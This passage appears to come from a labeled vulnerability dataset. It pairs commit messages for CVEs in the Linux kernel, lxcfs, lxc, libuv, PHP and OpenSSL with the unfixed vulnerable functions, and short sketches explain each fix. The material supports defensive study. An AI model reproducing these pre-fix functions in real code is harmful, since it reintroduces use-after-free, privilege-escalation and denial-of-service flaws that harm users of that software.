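The truncation described in the commit message is easy to demonstrate in user space: a 22-bit mask shifted left by 12 needs 34 bits, so an unsigned int silently drops the top two. A small sketch (constants mirror the x86_64 values quoted above):

#include <stdio.h>

#define PAGE_SHIFT	12
#define STACK_RND_MASK	0x3fffffUL	/* 22 bits on x86_64 */

int main(void)
{
	unsigned int narrow = STACK_RND_MASK;	/* the buggy type */
	unsigned long wide = STACK_RND_MASK;	/* the fixed type */

	narrow <<= PAGE_SHIFT;	/* wraps: top two bits lost */
	wide <<= PAGE_SHIFT;	/* keeps the full 34-bit result */
	printf("narrow=%#x wide=%#lx\n", narrow, wide);
	return 0;
}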
1,542 | linux | 600ddd6825543962fb807884169e57b580dba208 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/600ddd6825543962fb807884169e57b580dba208 | net: sctp: fix slab corruption from use after free on INIT collisions
When hitting an INIT collision case during the 4WHS with AUTH enabled, as
already described in detail in commit 1be9a950c646 ("net: sctp: inherit
auth_capable on INIT collisions"), it can happen that we occasionally
still remotely trigger the following panic on server side which seems to
have been uncovered after the fix from commit 1be9a950c646 ...
[ 533.876389] BUG: unable to handle kernel paging request at 00000000ffffffff
[ 533.913657] IP: [<ffffffff811ac385>] __kmalloc+0x95/0x230
[ 533.940559] PGD 5030f2067 PUD 0
[ 533.957104] Oops: 0000 [#1] SMP
[ 533.974283] Modules linked in: sctp mlx4_en [...]
[ 534.939704] Call Trace:
[ 534.951833] [<ffffffff81294e30>] ? crypto_init_shash_ops+0x60/0xf0
[ 534.984213] [<ffffffff81294e30>] crypto_init_shash_ops+0x60/0xf0
[ 535.015025] [<ffffffff8128c8ed>] __crypto_alloc_tfm+0x6d/0x170
[ 535.045661] [<ffffffff8128d12c>] crypto_alloc_base+0x4c/0xb0
[ 535.074593] [<ffffffff8160bd42>] ? _raw_spin_lock_bh+0x12/0x50
[ 535.105239] [<ffffffffa0418c11>] sctp_inet_listen+0x161/0x1e0 [sctp]
[ 535.138606] [<ffffffff814e43bd>] SyS_listen+0x9d/0xb0
[ 535.166848] [<ffffffff816149a9>] system_call_fastpath+0x16/0x1b
... or, depending on the application, for example this one:
[ 1370.026490] BUG: unable to handle kernel paging request at 00000000ffffffff
[ 1370.026506] IP: [<ffffffff811ab455>] kmem_cache_alloc+0x75/0x1d0
[ 1370.054568] PGD 633c94067 PUD 0
[ 1370.070446] Oops: 0000 [#1] SMP
[ 1370.085010] Modules linked in: sctp kvm_amd kvm [...]
[ 1370.963431] Call Trace:
[ 1370.974632] [<ffffffff8120f7cf>] ? SyS_epoll_ctl+0x53f/0x960
[ 1371.000863] [<ffffffff8120f7cf>] SyS_epoll_ctl+0x53f/0x960
[ 1371.027154] [<ffffffff812100d3>] ? anon_inode_getfile+0xd3/0x170
[ 1371.054679] [<ffffffff811e3d67>] ? __alloc_fd+0xa7/0x130
[ 1371.080183] [<ffffffff816149a9>] system_call_fastpath+0x16/0x1b
With slab debugging enabled, we can see that the poison has been overwritten:
[ 669.826368] BUG kmalloc-128 (Tainted: G W ): Poison overwritten
[ 669.826385] INFO: 0xffff880228b32e50-0xffff880228b32e50. First byte 0x6a instead of 0x6b
[ 669.826414] INFO: Allocated in sctp_auth_create_key+0x23/0x50 [sctp] age=3 cpu=0 pid=18494
[ 669.826424] __slab_alloc+0x4bf/0x566
[ 669.826433] __kmalloc+0x280/0x310
[ 669.826453] sctp_auth_create_key+0x23/0x50 [sctp]
[ 669.826471] sctp_auth_asoc_create_secret+0xcb/0x1e0 [sctp]
[ 669.826488] sctp_auth_asoc_init_active_key+0x68/0xa0 [sctp]
[ 669.826505] sctp_do_sm+0x29d/0x17c0 [sctp] [...]
[ 669.826629] INFO: Freed in kzfree+0x31/0x40 age=1 cpu=0 pid=18494
[ 669.826635] __slab_free+0x39/0x2a8
[ 669.826643] kfree+0x1d6/0x230
[ 669.826650] kzfree+0x31/0x40
[ 669.826666] sctp_auth_key_put+0x19/0x20 [sctp]
[ 669.826681] sctp_assoc_update+0x1ee/0x2d0 [sctp]
[ 669.826695] sctp_do_sm+0x674/0x17c0 [sctp]
Since this only triggers in some collision-cases with AUTH, the problem at
heart is that sctp_auth_key_put() on asoc->asoc_shared_key is called twice
when having refcnt 1, once directly in sctp_assoc_update() and yet again
from within sctp_auth_asoc_init_active_key() via sctp_assoc_update() on
the already kzfree'd memory, which is also consistent with the observation
of the poison decrease from 0x6b to 0x6a (note: the overwrite is detected
at a later point in time when poison is checked on new allocation).
Reference counting of auth keys revisited:
Shared keys for AUTH chunks are being stored in endpoints and associations
in endpoint_shared_keys list. On endpoint creation, a null key is being
added; on association creation, all endpoint shared keys are being cached
and thus cloned over to the association. struct sctp_shared_key only holds
a pointer to the actual key bytes, that is, struct sctp_auth_bytes which
keeps track of users internally through refcounting. Naturally, on assoc
or enpoint destruction, sctp_shared_key are being destroyed directly and
the reference on sctp_auth_bytes dropped.
User space can add keys to either list via setsockopt(2) through struct
sctp_authkey and by passing that to sctp_auth_set_key() which replaces or
adds a new auth key. There, sctp_auth_create_key() creates a new sctp_auth_bytes
with refcount 1 and in case of replacement drops the reference on the old
sctp_auth_bytes. A key can be set active from user space through setsockopt()
on the id via sctp_auth_set_active_key(), which iterates through either
endpoint_shared_keys and in case of an assoc, invokes (one of various places)
sctp_auth_asoc_init_active_key().
sctp_auth_asoc_init_active_key() computes the actual secret from local's
and peer's random, hmac and shared key parameters and returns a new key
directly as sctp_auth_bytes, that is asoc->asoc_shared_key, plus drops
the reference if there was a previous one. The secret on which we
eventually double-drop the ref comes from sctp_auth_asoc_set_secret() with
an initial refcount of 1, which also stays unchanged eventually in
sctp_assoc_update(). This key is later being used for crypto layer to
set the key for the hash in crypto_hash_setkey() from sctp_auth_calculate_hmac().
To close the loop: asoc->asoc_shared_key is freshly allocated secret
material and independent of the sctp_shared_key management keeping track
of only shared keys in endpoints and assocs. Hence, commit 4184b2a79a76
("net: sctp: fix memory leak in auth key management") is also independent of
this bug here since it concerns a different layer (though the same structures
are used eventually). asoc->asoc_shared_key has its reference dropped correctly
on assoc destruction in sctp_association_free() and when active keys are
being replaced in sctp_auth_asoc_init_active_key(), it always has a refcount
of 1. Hence, it's freed prematurely in sctp_assoc_update(). Simple fix is
to remove that sctp_auth_key_put() from there which fixes these panics.
Fixes: 730fc3d05cd4 ("[SCTP]: Implete SCTP-AUTH parameter processing")
Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
Acked-by: Vlad Yasevich <vyasevich@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | void sctp_assoc_update(struct sctp_association *asoc,
struct sctp_association *new)
{
struct sctp_transport *trans;
struct list_head *pos, *temp;
/* Copy in new parameters of peer. */
asoc->c = new->c;
asoc->peer.rwnd = new->peer.rwnd;
asoc->peer.sack_needed = new->peer.sack_needed;
asoc->peer.auth_capable = new->peer.auth_capable;
asoc->peer.i = new->peer.i;
sctp_tsnmap_init(&asoc->peer.tsn_map, SCTP_TSN_MAP_INITIAL,
asoc->peer.i.initial_tsn, GFP_ATOMIC);
/* Remove any peer addresses not present in the new association. */
list_for_each_safe(pos, temp, &asoc->peer.transport_addr_list) {
trans = list_entry(pos, struct sctp_transport, transports);
if (!sctp_assoc_lookup_paddr(new, &trans->ipaddr)) {
sctp_assoc_rm_peer(asoc, trans);
continue;
}
if (asoc->state >= SCTP_STATE_ESTABLISHED)
sctp_transport_reset(trans);
}
/* If the case is A (association restart), use
* initial_tsn as next_tsn. If the case is B, use
* current next_tsn in case data sent to peer
* has been discarded and needs retransmission.
*/
if (asoc->state >= SCTP_STATE_ESTABLISHED) {
asoc->next_tsn = new->next_tsn;
asoc->ctsn_ack_point = new->ctsn_ack_point;
asoc->adv_peer_ack_point = new->adv_peer_ack_point;
/* Reinitialize SSN for both local streams
* and peer's streams.
*/
sctp_ssnmap_clear(asoc->ssnmap);
/* Flush the ULP reassembly and ordered queue.
* Any data there will now be stale and will
* cause problems.
*/
sctp_ulpq_flush(&asoc->ulpq);
/* reset the overall association error count so
* that the restarted association doesn't get torn
* down on the next retransmission timer.
*/
asoc->overall_error_count = 0;
} else {
/* Add any peer addresses from the new association. */
list_for_each_entry(trans, &new->peer.transport_addr_list,
transports) {
if (!sctp_assoc_lookup_paddr(asoc, &trans->ipaddr))
sctp_assoc_add_peer(asoc, &trans->ipaddr,
GFP_ATOMIC, trans->state);
}
asoc->ctsn_ack_point = asoc->next_tsn - 1;
asoc->adv_peer_ack_point = asoc->ctsn_ack_point;
if (!asoc->ssnmap) {
/* Move the ssnmap. */
asoc->ssnmap = new->ssnmap;
new->ssnmap = NULL;
}
if (!asoc->assoc_id) {
/* get a new association id since we don't have one
* yet.
*/
sctp_assoc_set_id(asoc, GFP_ATOMIC);
}
}
/* SCTP-AUTH: Save the peer parameters from the new associations
* and also move the association shared keys over
*/
kfree(asoc->peer.peer_random);
asoc->peer.peer_random = new->peer.peer_random;
new->peer.peer_random = NULL;
kfree(asoc->peer.peer_chunks);
asoc->peer.peer_chunks = new->peer.peer_chunks;
new->peer.peer_chunks = NULL;
kfree(asoc->peer.peer_hmacs);
asoc->peer.peer_hmacs = new->peer.peer_hmacs;
new->peer.peer_hmacs = NULL;
sctp_auth_key_put(asoc->asoc_shared_key);
sctp_auth_asoc_init_active_key(asoc, GFP_ATOMIC);
}
| 245,205,618,481,032,000,000,000,000,000,000,000,000 | associola.c | 137,893,471,795,738,340,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2015-1421 | Use-after-free vulnerability in the sctp_assoc_update function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows remote attackers to cause a denial of service (slab corruption and panic) or possibly have unspecified other impact by triggering an INIT collision that leads to improper handling of shared-key data. | https://nvd.nist.gov/vuln/detail/CVE-2015-1421 |
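The slab corruption comes from two puts on a key whose refcount is 1: one at the call site above, one inside sctp_auth_asoc_init_active_key(). A generic sketch of the ownership rule the fix restores (hypothetical types):

#include <stdlib.h>

struct key { int refcnt; };

static void key_put(struct key *k)
{
	if (k && --k->refcnt == 0)
		free(k);
}

/* Exactly one owner drops the old key when installing a new one; a
 * second put at the call site would free it twice. */
static void replace_active_key(struct key **slot, struct key *fresh)
{
	key_put(*slot);
	*slot = fresh;
}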
1,543 | lxcfs | 8ee2a503e102b1a43ec4d83113dc275ab20a869a | https://github.com/lxc/lxcfs | https://github.com/lxc/lxcfs/commit/8ee2a503e102b1a43ec4d83113dc275ab20a869a | Implement privilege check when moving tasks
When writing pids to a tasks file in lxcfs, lxcfs was checking
for privilege over the tasks file but not over the pid being
moved. Since the cgm_movepid request is done as root on the host,
not with the requestor's credentials, we must copy the check which
cgmanager was doing to ensure that the requesting task is allowed
to change the victim task's cgroup membership.
This is CVE-2015-1344
https://bugs.launchpad.net/ubuntu/+source/lxcfs/+bug/1512854
Signed-off-by: Serge Hallyn <serge.hallyn@ubuntu.com> | 1 | static bool do_write_pids(pid_t tpid, const char *contrl, const char *cg, const char *file, const char *buf)
{
int sock[2] = {-1, -1};
pid_t qpid, cpid = -1;
FILE *pids_file = NULL;
bool answer = false, fail = false;
pids_file = open_pids_file(contrl, cg);
if (!pids_file)
return false;
/*
* write the pids to a socket, have helper in writer's pidns
* call movepid for us
*/
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sock) < 0) {
perror("socketpair");
goto out;
}
cpid = fork();
if (cpid == -1)
goto out;
if (!cpid) { // child
fclose(pids_file);
pid_from_ns_wrapper(sock[1], tpid);
}
const char *ptr = buf;
while (sscanf(ptr, "%d", &qpid) == 1) {
struct ucred cred;
char v;
if (write(sock[0], &qpid, sizeof(qpid)) != sizeof(qpid)) {
fprintf(stderr, "%s: error writing pid to child: %s\n",
__func__, strerror(errno));
goto out;
}
if (recv_creds(sock[0], &cred, &v)) {
if (v == '0') {
if (fprintf(pids_file, "%d", (int) cred.pid) < 0)
fail = true;
}
}
ptr = strchr(ptr, '\n');
if (!ptr)
break;
ptr++;
}
/* All good, write the value */
qpid = -1;
if (write(sock[0], &qpid ,sizeof(qpid)) != sizeof(qpid))
fprintf(stderr, "Warning: failed to ask child to exit\n");
if (!fail)
answer = true;
out:
if (cpid != -1)
wait_for_pid(cpid);
if (sock[0] != -1) {
close(sock[0]);
close(sock[1]);
}
if (pids_file) {
if (fclose(pids_file) != 0)
answer = false;
}
return answer;
}
| 6,339,406,417,675,714,000,000,000,000,000,000,000 | None | null | [
"CWE-264"
] | CVE-2015-1344 | The do_write_pids function in lxcfs.c in LXCFS before 0.12 does not properly check permissions, which allows local users to gain privileges by writing a pid to the tasks file. | https://nvd.nist.gov/vuln/detail/CVE-2015-1344 |
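do_write_pids() checks that the writer may touch the tasks file but never that it has any authority over the victim pid. One common proxy for such a check, sketched here with no claim that it is the exact test lxcfs adopted:

#include <signal.h>
#include <sys/types.h>

/* Signal 0 performs permission checking without delivering anything:
 * if the requester cannot even signal the victim, it should not be
 * allowed to move it between cgroups. */
static int may_move_pid(pid_t victim)
{
	return kill(victim, 0) == 0;
}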
1,565 | lxc | 72cf81f6a3404e35028567db2c99a90406e9c6e6 | https://github.com/lxc/lxc | https://github.com/lxc/lxc/commit/72cf81f6a3404e35028567db2c99a90406e9c6e6 | CVE-2015-1331: lxclock: use /run/lxc/lock rather than /run/lock/lxc
This prevents an unprivileged user to use LXC to create arbitrary file
on the filesystem.
Signed-off-by: Serge Hallyn <serge.hallyn@ubuntu.com>
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Stéphane Graber <stgraber@ubuntu.com> | 1 | static char *lxclock_name(const char *p, const char *n)
{
int ret;
int len;
char *dest;
char *rundir;
/* lockfile will be:
* "/run" + "/lock/lxc/$lxcpath/$lxcname + '\0' if root
* or
* $XDG_RUNTIME_DIR + "/lock/lxc/$lxcpath/$lxcname + '\0' if non-root
*/
/* length of "/lock/lxc/" + $lxcpath + "/" + "." + $lxcname + '\0' */
len = strlen("/lock/lxc/") + strlen(n) + strlen(p) + 3;
rundir = get_rundir();
if (!rundir)
return NULL;
len += strlen(rundir);
if ((dest = malloc(len)) == NULL) {
free(rundir);
return NULL;
}
ret = snprintf(dest, len, "%s/lock/lxc/%s", rundir, p);
if (ret < 0 || ret >= len) {
free(dest);
free(rundir);
return NULL;
}
ret = mkdir_p(dest, 0755);
if (ret < 0) {
/* fall back to "/tmp/" + $(id -u) + "/lxc" + $lxcpath + "/" + "." + $lxcname + '\0'
* * maximum length of $(id -u) is 10 calculated by (log (2 ** (sizeof(uid_t) * 8) - 1) / log 10 + 1)
* * lxcpath always starts with '/'
*/
int l2 = 22 + strlen(n) + strlen(p);
if (l2 > len) {
char *d;
d = realloc(dest, l2);
if (!d) {
free(dest);
free(rundir);
return NULL;
}
len = l2;
dest = d;
}
ret = snprintf(dest, len, "/tmp/%d/lxc%s", geteuid(), p);
if (ret < 0 || ret >= len) {
free(dest);
free(rundir);
return NULL;
}
ret = mkdir_p(dest, 0755);
if (ret < 0) {
free(dest);
free(rundir);
return NULL;
}
ret = snprintf(dest, len, "/tmp/%d/lxc%s/.%s", geteuid(), p, n);
} else
ret = snprintf(dest, len, "%s/lock/lxc/%s/.%s", rundir, p, n);
free(rundir);
if (ret < 0 || ret >= len) {
free(dest);
return NULL;
}
return dest;
}
| 245,452,041,723,366,300,000,000,000,000,000,000,000 | lxclock.c | 215,606,032,687,124,040,000,000,000,000,000,000,000 | [
"CWE-59"
] | CVE-2015-1331 | lxclock.c in LXC 1.1.2 and earlier allows local users to create arbitrary files via a symlink attack on /run/lock/lxc/*. | https://nvd.nist.gov/vuln/detail/CVE-2015-1331 |
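The fix moves lock files from the world-writable /run/lock into a daemon-owned /run/lxc/lock, removing the symlink-planting surface. A hedged sketch of the corrected path construction (helper name hypothetical):

#include <stdio.h>

/* Build the lock path under a directory unprivileged users cannot
 * pre-populate; callers still check for truncation. */
static int lock_path(char *dst, size_t len, const char *rundir,
		     const char *lxcpath, const char *name)
{
	int ret = snprintf(dst, len, "%s/lxc/lock%s/.%s",
			   rundir, lxcpath, name);

	return (ret < 0 || (size_t)ret >= len) ? -1 : 0;
}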
1,567 | libuv | 66ab38918c911bcff025562cf06237d7fedaba0c | https://github.com/libuv/libuv | https://github.com/libuv/libuv/commit/66ab38918c911bcff025562cf06237d7fedaba0c | unix: call setgroups before calling setuid/setgid
Partial fix for #1093 | 1 | static void uv__process_child_init(const uv_process_options_t* options,
int stdio_count,
int (*pipes)[2],
int error_fd) {
int close_fd;
int use_fd;
int fd;
if (options->flags & UV_PROCESS_DETACHED)
setsid();
for (fd = 0; fd < stdio_count; fd++) {
close_fd = pipes[fd][0];
use_fd = pipes[fd][1];
if (use_fd < 0) {
if (fd >= 3)
continue;
else {
/* redirect stdin, stdout and stderr to /dev/null even if UV_IGNORE is
* set
*/
use_fd = open("/dev/null", fd == 0 ? O_RDONLY : O_RDWR);
close_fd = use_fd;
if (use_fd == -1) {
uv__write_int(error_fd, -errno);
perror("failed to open stdio");
_exit(127);
}
}
}
if (fd == use_fd)
uv__cloexec(use_fd, 0);
else
dup2(use_fd, fd);
if (fd <= 2)
uv__nonblock(fd, 0);
if (close_fd != -1)
uv__close(close_fd);
}
for (fd = 0; fd < stdio_count; fd++) {
use_fd = pipes[fd][1];
if (use_fd >= 0 && fd != use_fd)
close(use_fd);
}
if (options->cwd != NULL && chdir(options->cwd)) {
uv__write_int(error_fd, -errno);
perror("chdir()");
_exit(127);
}
if ((options->flags & UV_PROCESS_SETGID) && setgid(options->gid)) {
uv__write_int(error_fd, -errno);
perror("setgid()");
_exit(127);
}
if ((options->flags & UV_PROCESS_SETUID) && setuid(options->uid)) {
uv__write_int(error_fd, -errno);
perror("setuid()");
_exit(127);
}
if (options->env != NULL) {
environ = options->env;
}
execvp(options->file, options->args);
uv__write_int(error_fd, -errno);
perror("execvp()");
_exit(127);
}
| 260,532,967,559,578,820,000,000,000,000,000,000,000 | process.c | 230,071,590,411,145,400,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-0278 | libuv before 0.10.34 does not properly drop group privileges, which allows context-dependent attackers to gain privileges via unspecified vectors. | https://nvd.nist.gov/vuln/detail/CVE-2015-0278 |
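uv__process_child_init() above calls setgid()/setuid() but never clears supplementary groups, so the child keeps the parent's group memberships. A Linux-flavoured sketch of the ordering the fix introduces (drop groups first, since setgroups() is no longer permitted once the uid is dropped):

#include <grp.h>
#include <unistd.h>

static int drop_privs(uid_t uid, gid_t gid)
{
	if (setgroups(0, NULL) != 0)	/* clear supplementary groups */
		return -1;
	if (setgid(gid) != 0)		/* then the primary gid */
		return -1;
	if (setuid(uid) != 0)		/* uid last of all */
		return -1;
	return 0;
}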
1,578 | linux | f3747379accba8e95d70cec0eae0582c8c182050 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3747379accba8e95d70cec0eae0582c8c182050 | KVM: x86: SYSENTER emulation is broken
SYSENTER emulation is broken in several ways:
1. It misses the case of 16-bit code segments completely (CVE-2015-0239).
2. MSR_IA32_SYSENTER_CS is checked in 64-bit mode incorrectly (bits 0 and 1 can
still be set without causing #GP).
3. MSR_IA32_SYSENTER_EIP and MSR_IA32_SYSENTER_ESP are not masked in
legacy-mode.
4. There is some unneeded code.
Fix it.
Cc: stable@vger.linux.org
Signed-off-by: Nadav Amit <namit@cs.technion.ac.il>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> | 1 | static int em_sysenter(struct x86_emulate_ctxt *ctxt)
{
const struct x86_emulate_ops *ops = ctxt->ops;
struct desc_struct cs, ss;
u64 msr_data;
u16 cs_sel, ss_sel;
u64 efer = 0;
ops->get_msr(ctxt, MSR_EFER, &efer);
/* inject #GP if in real mode */
if (ctxt->mode == X86EMUL_MODE_REAL)
return emulate_gp(ctxt, 0);
/*
* Not recognized on AMD in compat mode (but is recognized in legacy
* mode).
*/
if ((ctxt->mode == X86EMUL_MODE_PROT32) && (efer & EFER_LMA)
&& !vendor_intel(ctxt))
return emulate_ud(ctxt);
/* sysenter/sysexit have not been tested in 64bit mode. */
if (ctxt->mode == X86EMUL_MODE_PROT64)
return X86EMUL_UNHANDLEABLE;
setup_syscalls_segments(ctxt, &cs, &ss);
ops->get_msr(ctxt, MSR_IA32_SYSENTER_CS, &msr_data);
switch (ctxt->mode) {
case X86EMUL_MODE_PROT32:
if ((msr_data & 0xfffc) == 0x0)
return emulate_gp(ctxt, 0);
break;
case X86EMUL_MODE_PROT64:
if (msr_data == 0x0)
return emulate_gp(ctxt, 0);
break;
default:
break;
}
ctxt->eflags &= ~(EFLG_VM | EFLG_IF);
cs_sel = (u16)msr_data;
cs_sel &= ~SELECTOR_RPL_MASK;
ss_sel = cs_sel + 8;
ss_sel &= ~SELECTOR_RPL_MASK;
if (ctxt->mode == X86EMUL_MODE_PROT64 || (efer & EFER_LMA)) {
cs.d = 0;
cs.l = 1;
}
ops->set_segment(ctxt, cs_sel, &cs, 0, VCPU_SREG_CS);
ops->set_segment(ctxt, ss_sel, &ss, 0, VCPU_SREG_SS);
ops->get_msr(ctxt, MSR_IA32_SYSENTER_EIP, &msr_data);
ctxt->_eip = msr_data;
ops->get_msr(ctxt, MSR_IA32_SYSENTER_ESP, &msr_data);
*reg_write(ctxt, VCPU_REGS_RSP) = msr_data;
return X86EMUL_CONTINUE;
}
| 288,467,064,513,453,420,000,000,000,000,000,000,000 | emulate.c | 260,001,730,116,912,800,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-0239 | The em_sysenter function in arch/x86/kvm/emulate.c in the Linux kernel before 3.18.5, when the guest OS lacks SYSENTER MSR initialization, allows guest OS users to gain guest OS privileges or cause a denial of service (guest OS crash) by triggering use of a 16-bit code segment for emulation of a SYSENTER instruction. | https://nvd.nist.gov/vuln/detail/CVE-2015-0239 |
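Two of the four listed defects condense into small predicates: the CS MSR check must ignore only bits 0-1, and the EIP/ESP MSR values must be truncated to 32 bits outside long mode. A sketch of both, detached from the emulator's types:

#include <stdint.h>

/* Reject a selector whose index bits are all zero, regardless of the
 * RPL bits 0-1 -- the check the fix applies in every mode. */
static int sysenter_cs_ok(uint64_t msr_cs)
{
	return (msr_cs & 0xfffcu) != 0;
}

/* In legacy/compat mode the SYSENTER EIP/ESP targets are 32-bit. */
static uint64_t sysenter_target(uint64_t msr, int long_mode)
{
	return long_mode ? msr : (uint32_t)msr;
}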
1,579 | php-src | b585a3aed7880a5fa5c18e2b838fc96f40e075bd | https://github.com/php/php-src | https://github.com/php/php-src/commit/b585a3aed7880a5fa5c18e2b838fc96f40e075bd | Fix for bug #68710 (Use After Free Vulnerability in PHP's unserialize()) | 1 | static inline int process_nested_data(UNSERIALIZE_PARAMETER, HashTable *ht, long elements, int objprops)
{
while (elements-- > 0) {
zval *key, *data, **old_data;
ALLOC_INIT_ZVAL(key);
if (!php_var_unserialize(&key, p, max, NULL TSRMLS_CC)) {
zval_dtor(key);
FREE_ZVAL(key);
return 0;
}
if (Z_TYPE_P(key) != IS_LONG && Z_TYPE_P(key) != IS_STRING) {
zval_dtor(key);
FREE_ZVAL(key);
return 0;
}
ALLOC_INIT_ZVAL(data);
if (!php_var_unserialize(&data, p, max, var_hash TSRMLS_CC)) {
zval_dtor(key);
FREE_ZVAL(key);
zval_dtor(data);
FREE_ZVAL(data);
return 0;
}
if (!objprops) {
switch (Z_TYPE_P(key)) {
case IS_LONG:
if (zend_hash_index_find(ht, Z_LVAL_P(key), (void **)&old_data)==SUCCESS) {
var_push_dtor(var_hash, old_data);
}
zend_hash_index_update(ht, Z_LVAL_P(key), &data, sizeof(data), NULL);
break;
case IS_STRING:
if (zend_symtable_find(ht, Z_STRVAL_P(key), Z_STRLEN_P(key) + 1, (void **)&old_data)==SUCCESS) {
var_push_dtor(var_hash, old_data);
}
zend_symtable_update(ht, Z_STRVAL_P(key), Z_STRLEN_P(key) + 1, &data, sizeof(data), NULL);
break;
}
} else {
/* object properties should include no integers */
convert_to_string(key);
if (zend_symtable_find(ht, Z_STRVAL_P(key), Z_STRLEN_P(key) + 1, (void **)&old_data)==SUCCESS) {
var_push_dtor(var_hash, old_data);
}
zend_hash_update(ht, Z_STRVAL_P(key), Z_STRLEN_P(key) + 1, &data,
sizeof data, NULL);
}
zval_dtor(key);
FREE_ZVAL(key);
if (elements && *(*p-1) != ';' && *(*p-1) != '}') {
(*p)--;
return 0;
}
	}

	return 1;
}
| 722,330,690,057,935,600,000,000,000,000,000,000 | None | null | [
"CWE-94"
] | CVE-2015-0231 | Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142. | https://nvd.nist.gov/vuln/detail/CVE-2015-0231 |
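The use-after-free pattern here is generic: var_push_dtor() caches a pointer to the old value, and a later duplicate key frees that value while the cache still references it. A stand-alone sketch of the stale-alias hazard and the invalidate-on-replace fix shape (hypothetical structures, not the Zend internals):

#include <stdlib.h>

struct slot { void *val; };

/* Releasing the old value must also clear any cached alias to it,
 * otherwise a later dereference through the alias hits freed memory. */
static void update_slot(struct slot *s, void **alias, void *fresh)
{
	if (alias != NULL && *alias == s->val)
		*alias = NULL;
	free(s->val);
	s->val = fresh;
}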
1,580 | openssl | 103b171d8fc282ef435f8de9afbf7782e312961f | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/103b171d8fc282ef435f8de9afbf7782e312961f | A memory leak can occur in dtls1_buffer_record if either of the calls to
ssl3_setup_buffers or pqueue_insert fail. The former will fail if there is a
malloc failure, whilst the latter will fail if attempting to add a duplicate
record to the queue. This should never happen because duplicate records should
be detected and dropped before any attempt to add them to the queue.
Unfortunately records that arrive that are for the next epoch are not being
recorded correctly, and therefore replays are not being detected.
Additionally, these "should not happen" failures that can occur in
dtls1_buffer_record are not being treated as fatal and therefore an attacker
could exploit this by sending repeated replay records for the next epoch,
eventually causing a DoS through memory exhaustion.
Thanks to Chris Mueller for reporting this issue and providing initial
analysis and a patch. Further analysis and the final patch was performed by
Matt Caswell from the OpenSSL development team.
CVE-2015-0206
Reviewed-by: Dr Stephen Henson <steve@openssl.org> | 1 | dtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)
{
DTLS1_RECORD_DATA *rdata;
pitem *item;
/* Limit the size of the queue to prevent DOS attacks */
if (pqueue_size(queue->q) >= 100)
return 0;
rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));
item = pitem_new(priority, rdata);
if (rdata == NULL || item == NULL)
{
if (rdata != NULL) OPENSSL_free(rdata);
if (item != NULL) pitem_free(item);
SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
return(0);
}
rdata->packet = s->packet;
rdata->packet_length = s->packet_length;
memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));
memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));
item->data = rdata;
#ifndef OPENSSL_NO_SCTP
/* Store bio_dgram_sctp_rcvinfo struct */
if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&
(s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {
BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);
}
#endif
s->packet = NULL;
s->packet_length = 0;
memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));
memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));
if (!ssl3_setup_buffers(s))
{
SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
OPENSSL_free(rdata);
pitem_free(item);
return(0);
}
/* insert should not fail, since duplicates are dropped */
if (pqueue_insert(queue->q, item) == NULL)
{
SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);
OPENSSL_free(rdata);
pitem_free(item);
return(0);
}
return(1);
}
| 114,939,372,772,634,080,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2015-0206 | Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate records for the next epoch, leading to failure of replay detection. | https://nvd.nist.gov/vuln/detail/CVE-2015-0206 |
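Beyond the replay-detection gap, the commit makes the "should not happen" failure paths fatal and leak-free. A compact sketch of that error-path shape (stand-in types):

#include <stdlib.h>

struct pitem { void *data; };

/* On a failed insert, release both the record copy and the queue item
 * and report a fatal error, so repeated crafted replays cannot be
 * used to grind memory. */
static int buffer_record(struct pitem *item, void *rdata, int inserted)
{
	if (!inserted) {
		free(rdata);
		free(item);
		return -1;	/* fatal, not a silent 0 */
	}
	item->data = rdata;
	return 1;
}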
1,584 | openssl | 1421e0c584ae9120ca1b88098f13d6d2e90b83a3 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/1421e0c584ae9120ca1b88098f13d6d2e90b83a3 | Unauthenticated DH client certificate fix.
Fix to prevent use of DH client certificates without sending
certificate verify message.
If we've used a client certificate to generate the premaster secret
ssl3_get_client_key_exchange returns 2 and ssl3_get_cert_verify is
never called.
We can only skip the certificate verify message in
ssl3_get_cert_verify if the client didn't send a certificate.
Thanks to Karthikeyan Bhargavan for reporting this issue.
CVE-2015-0205
Reviewed-by: Matt Caswell <matt@openssl.org> | 1 | int ssl3_get_cert_verify(SSL *s)
{
EVP_PKEY *pkey=NULL;
unsigned char *p;
int al,ok,ret=0;
long n;
